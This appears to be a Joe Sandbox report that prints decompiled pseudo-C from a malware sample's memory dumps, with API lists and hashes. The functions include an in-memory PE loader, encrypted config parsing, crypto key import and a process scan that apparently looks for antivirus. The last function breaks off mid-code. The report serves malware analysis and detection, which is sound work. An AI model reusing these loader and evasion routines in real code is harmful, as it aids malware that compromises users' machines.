				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x109a348; // 0xa6d5a8
				_t4 = _t15 + 0x109b3a0; // 0x1b08948
				_t20 = _t4;
				_t6 = _t15 + 0x109b124; // 0x650047
				_t17 = E01092E7B(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E01096ADD(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x01093d2a
0x01093d31
0x01093d32
0x01093d33
0x01093d34
0x01093d3a
0x01093d3f
0x01093d3f
0x01093d49
0x01093d5b
0x01093d62
0x01093d90
0x01093d64
0x01093d66
0x01093d6b
0x01093d8d
0x01093d6d
0x01093d70
0x01093d77
0x01093d7c
0x01093d7e
0x01093d7e
0x01093d83
0x01093d83
0x01093d6b
0x01093d97

APIs

Part of subcall function 01092E7B: SysFreeString.OLEAUT32(?), ref: 01092F5A

Part of subcall function 01096ADD: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,01091FB1,004F0053,00000000,?), ref: 01096AE6
Part of subcall function 01096ADD: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,01091FB1,004F0053,00000000,?), ref: 01096B10
Part of subcall function 01096ADD: memset.NTDLL ref: 01096B24

SysFreeString.OLEAUT32(00000000), ref: 01093D83

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: af9a8bc346ebbf9a45b25f4d3f0994a5e7f9206ba247b65e70adaf0f93f0623b
Instruction ID: d56b46859cee1d60984e863c65dbc02430ad35941d425974c92feb4da15d809d
Opcode Fuzzy Hash: af9a8bc346ebbf9a45b25f4d3f0994a5e7f9206ba247b65e70adaf0f93f0623b
Instruction Fuzzy Hash: C0015E31501119BFDF51AFA8EC24EEEBBB8FB04650F008569FA85E7060E771A915DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00401876 Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00401876(void* __eax, intOrPtr _a4) {

				 *0x403190 =  *0x403190 & 0x00000000;
				_push(0);
				_push(0x40318c);
				_push(1);
				_push(_a4);
				 *0x403188 = 0xc; // executed
				L004013E0(); // executed
				return __eax;
			}

0x00401876
0x0040187d
0x0040187f
0x00401884
0x00401886
0x0040188a
0x00401894
0x00401899

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401E7E,00000001,0040318C,00000000), ref: 00401894

Memory Dump Source

Source File: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.819938819.0000000000404000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.819938819.0000000000406000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_maintainabovl.jbxd

Yara matches

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 5732e74c5c2bc5cc7433fa2932495c9ba70c003d5c64a67f7b80ff6ab26a808d
Instruction ID: 53c4b3fbda59697ffe2b5d8dc5fefb1938645d4b8a10883f9f6efb7ebe52aea2
Opcode Fuzzy Hash: 5732e74c5c2bc5cc7433fa2932495c9ba70c003d5c64a67f7b80ff6ab26a808d
Instruction Fuzzy Hash: 14C04C74240300B7F6109F409D86F057E95775874AF60052EFA04391E1C3F95154952D

Uniqueness

Uniqueness Score: -1.00%

Function 00401F0B Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401F0B(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x403160, 0, _a4); // executed
				return _t2;
			}

0x00401f17
0x00401f1d

APIs

RtlAllocateHeap.NTDLL(00000000,?,0040119F,00000030,?,00000000), ref: 00401F17

Memory Dump Source

Source File: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.819938819.0000000000404000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.819938819.0000000000406000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_maintainabovl.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ffc2bee7e96f03ba20f6f25c32e4a96c4cf6c99a047c73a93cb7f1116150704d
Instruction ID: 3092cf90e7a1d4585fff80d284c7a06f71a0cf960e90f0812a630bad4f7f329e
Opcode Fuzzy Hash: ffc2bee7e96f03ba20f6f25c32e4a96c4cf6c99a047c73a93cb7f1116150704d
Instruction Fuzzy Hash: 82B01271104200ABCA114F50DF08F067E21B798701F004030B304340B082710820FB1D

Uniqueness

Uniqueness Score: -1.00%

Function 004013E6 Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004013E6(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x403160, 0, _a4); // executed
				return _t2;
			}

0x004013f2
0x004013f8

APIs

RtlFreeHeap.NTDLL(00000000,00000030,00401165,00000000,00000030,00000000,00000000,00000030,?,?,?,?,?,004011ED), ref: 004013F2

Memory Dump Source

Source File: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.819938819.0000000000404000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.819938819.0000000000406000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_maintainabovl.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c2a9b64b8d0978bf82175768f91838575790ce16ddbfb376c354ea20483dfce9
Instruction ID: 19babb2e5ad36de5e86cb2f69479443a556bd5f033cd34182d883786aa01e702
Opcode Fuzzy Hash: c2a9b64b8d0978bf82175768f91838575790ce16ddbfb376c354ea20483dfce9
Instruction Fuzzy Hash: EBB01231004200ABDA114F50DF08F067F21B798701F008030B304740B082710920FB0C

Uniqueness

Uniqueness Score: -1.00%

Function 004014DF Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004014DF(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				void* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x403180;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403180 - 0x69b24f45 &  !( *0x403180 - 0x69b24f45);
				_t18 = E004013FB( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403180 - 0x69b24f45 &  !( *0x403180 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403180 - 0x69b24f45 &  !( *0x403180 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E00401583(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E0040171E(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E00401A88(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E004013E6(_t42);
					L8:
					return _t29;
				}
			}

0x004014e7
0x004014e9
0x00401505
0x00401516
0x0040151d
0x0040157b
0x00000000
0x0040151f
0x0040151f
0x00401529
0x0040152d
0x00401532
0x00401535
0x0040153a
0x0040153e
0x00401543
0x00401548
0x0040154c
0x00401551
0x00401552
0x00401556
0x0040155b
0x00401563
0x00401563
0x0040155b
0x0040154c
0x0040153e
0x00401565
0x0040156e
0x00401572
0x0040157c
0x00401582
0x00401582

APIs

Part of subcall function 004013FB: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,0040151B,?,?,?,?,?,00000002,?,?), ref: 0040141F
Part of subcall function 004013FB: GetProcAddress.KERNEL32(00000000,?), ref: 00401441
Part of subcall function 004013FB: GetProcAddress.KERNEL32(00000000,?), ref: 00401457
Part of subcall function 004013FB: GetProcAddress.KERNEL32(00000000,?), ref: 0040146D
Part of subcall function 004013FB: GetProcAddress.KERNEL32(00000000,?), ref: 00401483
Part of subcall function 004013FB: GetProcAddress.KERNEL32(00000000,?), ref: 00401499

Part of subcall function 0040171E: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401756

Part of subcall function 00401A88: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401AC1
Part of subcall function 00401A88: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 00401B36
Part of subcall function 00401A88: GetLastError.KERNEL32 ref: 00401B3C

GetLastError.KERNEL32(?,?), ref: 0040155D

Memory Dump Source

Source File: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.819938819.0000000000404000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.819938819.0000000000406000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_maintainabovl.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
String ID:
API String ID: 3135819546-0
Opcode ID: 938c4a15b1895a26e866699c751ff346a7f2e10a773ba6817d8333fad46ba47a
Instruction ID: 88a4bd3449c07186c518bb40649dcadd21006ef22d6474a662c7794d1a494191
Opcode Fuzzy Hash: 938c4a15b1895a26e866699c751ff346a7f2e10a773ba6817d8333fad46ba47a
Instruction Fuzzy Hash: C511E976600701BBD721AAA58C81DAB77ACAFC8354700013FEE02BB691EEB4ED058794

Uniqueness

Uniqueness Score: -1.00%

Function 01095DB1 Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E01095DB1(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E010952F6( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E01096A51(_a8 + _a8);
					if(_t21 != 0) {
						E01093215(_a4, _t21, _t23);
					}
					E0109692B(_a4);
				}
				return _t21;
			}

0x01095db9
0x01095dc0
0x01095dc2
0x01095dd1
0x01095dd8
0x01095de7
0x01095deb
0x01095df2
0x01095df2
0x01095dfa
0x01095dff
0x01095e04

APIs

lstrlen.KERNEL32(00000000,00000000,0109384E,00000000,?,01095881,00000000,0109384E,?,775EC740,0109384E,00000000,01B09600), ref: 01095DC2

Part of subcall function 010952F6: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,01095DD6,00000001,0109384E,00000000), ref: 0109532E
Part of subcall function 010952F6: memcpy.NTDLL(01095DD6,0109384E,00000010,?,?,?,01095DD6,00000001,0109384E,00000000,?,01095881,00000000,0109384E,?,775EC740), ref: 01095347
Part of subcall function 010952F6: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 01095370
Part of subcall function 010952F6: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 01095388
Part of subcall function 010952F6: memcpy.NTDLL(00000000,775EC740,01B09600,00000010), ref: 010953DA

Part of subcall function 01096A51: RtlAllocateHeap.NTDLL(00000000,00000000,01093005), ref: 01096A5D

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
String ID:
API String ID: 894908221-0
Opcode ID: 14458ad181fc80a901b6d6ed1bef6031ad895ece23b6e1acb709a995dda3e229
Instruction ID: ed7d0d77fb13fc60ddf21b2b936cb9b98d12d518e3d543a5f6ea26ac20fdb499
Opcode Fuzzy Hash: 14458ad181fc80a901b6d6ed1bef6031ad895ece23b6e1acb709a995dda3e229
Instruction Fuzzy Hash: FBF08936100109BBCF126F56DC14DEF3FADEF95754F008022FD59CA014DA32DA55ABA0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01097596 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 258
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E01097596(void* __ebx, int* __ecx, void* __edx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				void* _v16;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t116;
				void* _t119;
				intOrPtr _t122;

				_t119 = __esi;
				_t116 = __edi;
				_t104 = __ecx;
				_t101 = __ebx;
				_t28 =  *0x109a344; // 0x69b25f44
				if(E010964ED( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x109a374 = _v8;
				}
				_t33 =  *0x109a344; // 0x69b25f44
				if(E010964ED( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x109a344; // 0x69b25f44
				_push(_t116);
				if(E010964ED( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x109a2d8, 0, _v16);
					goto L69;
				} else {
					_push(_t101);
					_t102 = _v12;
					if(_t102 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x109a344; // 0x69b25f44
						_t45 = E01096FA8(_t104, _t102, _t98 ^ 0x7895433b);
					}
					_push(_t119);
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x109a2e0 = _v8;
						}
					}
					if(_t102 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x109a344; // 0x69b25f44
						_t46 = E01096FA8(_t104, _t102, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x109a2e4 = _v8;
						}
					}
					if(_t102 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x109a344; // 0x69b25f44
						_t47 = E01096FA8(_t104, _t102, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x109a2e8 = _v8;
						}
					}
					if(_t102 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x109a344; // 0x69b25f44
						_t48 = E01096FA8(_t104, _t102, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x109a004 = _v8;
						}
					}
					if(_t102 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x109a344; // 0x69b25f44
						_t49 = E01096FA8(_t104, _t102, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x109a02c = _v8;
						}
					}
					if(_t102 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x109a344; // 0x69b25f44
						_t50 = E01096FA8(_t104, _t102, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x109a2ec = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t102 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x109a344; // 0x69b25f44
								_t51 = E01096FA8(_t104, _t102, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E01095D66(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E01093A2A();
								}
							}
							if(_t102 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x109a344; // 0x69b25f44
								_t52 = E01096FA8(_t104, _t102, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E01095D66(0, _t52) != 0) {
								_t122 =  *0x109a3cc; // 0x1b09600
								E0109460D(_t122 + 4, _t68);
							}
							if(_t102 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x109a344; // 0x69b25f44
								_t53 = E01096FA8(_t104, _t102, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x109a348; // 0xa6d5a8
								_t22 = _t54 + 0x109b252; // 0x616d692f
								 *0x109a370 = _t22;
								goto L60;
							} else {
								_t64 = E01095D66(0, _t53);
								 *0x109a370 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t102 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x109a344; // 0x69b25f44
										_t56 = E01096FA8(_t104, _t102, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x109a348; // 0xa6d5a8
										_t23 = _t57 + 0x109b79e; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E01095D66(0, _t56);
									}
									 *0x109a3e0 = _t58;
									HeapFree( *0x109a2d8, 0, _t102);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}

0x01097596
0x01097596
0x01097596
0x01097596
0x01097599
0x010975b6
0x010975c4
0x010975c4
0x010975c9
0x010975e3
0x01097851
0x01097858
0x0109785c
0x0109785c
0x010975e9
0x010975ee
0x01097606
0x0109783e
0x01097848
0x00000000
0x0109760c
0x0109760c
0x0109760d
0x01097612
0x01097628
0x01097614
0x01097614
0x01097621
0x01097621
0x0109762a
0x01097633
0x01097635
0x0109763f
0x01097644
0x01097644
0x0109763f
0x0109764b
0x01097661
0x0109764d
0x0109764d
0x0109765a
0x0109765a
0x01097665
0x01097667
0x01097671
0x01097676
0x01097676
0x01097671
0x0109767d
0x01097693
0x0109767f
0x0109767f
0x0109768c
0x0109768c
0x01097697
0x01097699
0x010976a3
0x010976a8
0x010976a8
0x010976a3
0x010976af
0x010976c5
0x010976b1
0x010976b1
0x010976be
0x010976be
0x010976c9
0x010976cb
0x010976d5
0x010976da
0x010976da
0x010976d5
0x010976e1
0x010976f7
0x010976e3
0x010976e3
0x010976f0
0x010976f0
0x010976fb
0x010976fd
0x01097707
0x0109770c
0x0109770c
0x01097707
0x01097713
0x01097729
0x01097715
0x01097715
0x01097722
0x01097722
0x0109772d
0x01097740
0x01097740
0x00000000
0x0109772f
0x0109772f
0x01097739
0x00000000
0x0109774a
0x0109774a
0x0109774c
0x01097762
0x0109774e
0x0109774e
0x0109775b
0x0109775b
0x01097766
0x01097768
0x0109776b
0x0109776c
0x01097773
0x01097775
0x01097776
0x01097776
0x01097773
0x0109777d
0x01097793
0x0109777f
0x0109777f
0x0109778c
0x0109778c
0x01097797
0x010977a5
0x010977af
0x010977af
0x010977b7
0x010977cd
0x010977b9
0x010977b9
0x010977c6
0x010977c6
0x010977d1
0x010977e4
0x010977e4
0x010977e9
0x010977ef
0x00000000
0x010977d3
0x010977d6
0x010977db
0x010977e2
0x010977f4
0x010977f6
0x0109780c
0x010977f8
0x010977f8
0x01097805
0x01097805
0x01097810
0x0109781c
0x01097821
0x01097821
0x01097812
0x01097815
0x01097815
0x0109782f
0x01097834
0x0109783a
0x00000000
0x0109783d
0x00000000
0x010977e2
0x010977d1
0x01097739
0x0109772d

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,0109A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 0109763B
StrToIntExA.SHLWAPI(00000000,00000000,?,0109A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 0109766D
StrToIntExA.SHLWAPI(00000000,00000000,?,0109A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 0109769F
StrToIntExA.SHLWAPI(00000000,00000000,?,0109A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 010976D1
StrToIntExA.SHLWAPI(00000000,00000000,?,0109A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 01097703
StrToIntExA.SHLWAPI(00000000,00000000,?,0109A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 01097735
HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 01097834
HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 01097848

Strings

Uqt, xrefs: 01097834, 01097848

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: FreeHeap
String ID: Uqt
API String ID: 3298025750-2320327147
Opcode ID: 332c717883590384bc2e05ae4bfaa15d49f000f1fcf036e985b9a94948c66687
Instruction ID: a2d4868619bcb57e75ceaca665266dec98621262ea906ed30c370363963a568d
Opcode Fuzzy Hash: 332c717883590384bc2e05ae4bfaa15d49f000f1fcf036e985b9a94948c66687
Instruction Fuzzy Hash: A581F472B20200EBDF61EBBC9DB4D9F7BE9BB4C60072449A5A181D7108F67AD940AF50

Uniqueness

Uniqueness Score: -1.00%

Function 010931AB Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E010931AB() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x109a348; // 0xa6d5a8
						_t2 = _t9 + 0x109bea8; // 0x73617661
						_push( &_v264);
						if( *0x109a12c() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x010931b6
0x010931c0
0x010931c4
0x010931ce
0x010931ff
0x010931d5
0x010931da
0x010931e7
0x010931f0
0x01093207
0x010931f2
0x010931fa
0x00000000
0x010931fa
0x01093208
0x01093209
0x00000000
0x01093209
0x00000000
0x01093203
0x0109320f
0x01093214

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 010931BB
Process32First.KERNEL32(00000000,?), ref: 010931CE
Process32Next.KERNEL32(00000000,?), ref: 010931FA
CloseHandle.KERNEL32(00000000), ref: 01093209

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: deedbf259be1a03c3147ab1886036652d0de07a1d7ae98c39f113bb670fc09a0
Instruction ID: c2863e0ebecad3ffe5d58d0f31bd8c09940569304cd416682829e446c1b9b86e
Opcode Fuzzy Hash: deedbf259be1a03c3147ab1886036652d0de07a1d7ae98c39f113bb670fc09a0
Instruction Fuzzy Hash: 38F096726011296ADF60AA769C69EEB3AACFBC5350F0001A1FAD5D7000EA649949DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01098491 Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01098491(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x109a380; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x109a3c8 = 1;
										__eflags =  *0x109a3c8;
										if( *0x109a3c8 != 0) {
											goto L60;
										}
										_t84 =  *0x109a380; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
